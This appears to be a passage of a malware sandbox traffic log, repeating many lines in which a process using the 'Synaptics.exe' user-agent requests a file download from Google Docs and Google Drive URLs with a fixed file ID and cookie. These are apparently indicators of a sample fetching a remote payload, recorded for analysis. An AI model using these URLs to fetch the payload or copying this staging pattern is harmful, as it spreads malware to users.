                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
